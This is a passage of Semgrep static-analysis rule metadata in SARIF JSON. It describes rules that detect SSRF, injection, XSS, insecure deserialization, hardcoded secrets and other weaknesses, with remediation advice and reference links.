vulnerabilities."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","id":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","name":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf","id":"java.servlets.security.tainted-ssrf.tainted-ssrf","name":"java.servlets.security.tainted-ssrf.tainted-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf.tainted-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"help":{"markdown":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2)\n","text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2","id":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","name":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-multiprocess2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"help":{"markdown":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session)\n - [https://en.wikipedia.org/wiki/Session_poisoning](https://en.wikipedia.org/wiki/Session_poisoning)\n","text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session","id":"php.lang.security.injection.tainted-session.tainted-session","name":"php.lang.security.injection.tainted-session.tainted-session","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-session.tainted-session"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"help":{"markdown":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n","text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"helpUri":"https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","id":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","name":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","id":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","name":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"help":{"markdown":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"helpUri":"https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","id":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","name":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"help":{"markdown":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n","text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","id":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","name":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","id":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","name":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection","id":"java.lang.security.audit.el-injection.el-injection","name":"java.lang.security.audit.el-injection.el-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.el-injection.el-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint","id":"rust.rocket.nosql.mongodb-taint.mongodb-taint","name":"rust.rocket.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"help":{"markdown":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string","id":"java.spring.security.injection.tainted-html-string.tainted-html-string","name":"java.spring.security.injection.tainted-html-string.tainted-html-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-html-string.tainted-html-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","id":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","name":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","id":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","name":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli)\n - [https://www.npmjs.com/package/pg](https://www.npmjs.com/package/pg)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli","id":"javascript.express.pg.express-pg-sqli.express-pg-sqli","name":"javascript.express.pg.express-pg-sqli.express-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.pg.express-pg-sqli.express-pg-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","id":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","name":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"help":{"markdown":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off)\n - [https://docs.djangoproject.com/en/3.1/ref/settings/#templates](https://docs.djangoproject.com/en/3.1/ref/settings/#templates)\n - [https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates](https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates)\n","text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","id":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","name":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.context-autoescape-off.context-autoescape-off"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"help":{"markdown":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate)\n - [https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345](https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345)\n","text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","id":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","name":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"help":{"markdown":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","id":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","name":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","properties":{"precision":"very-high","tags":["CWE-406: Insufficient Control of Network Message Volume (Network Amplification)","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","id":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","name":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM 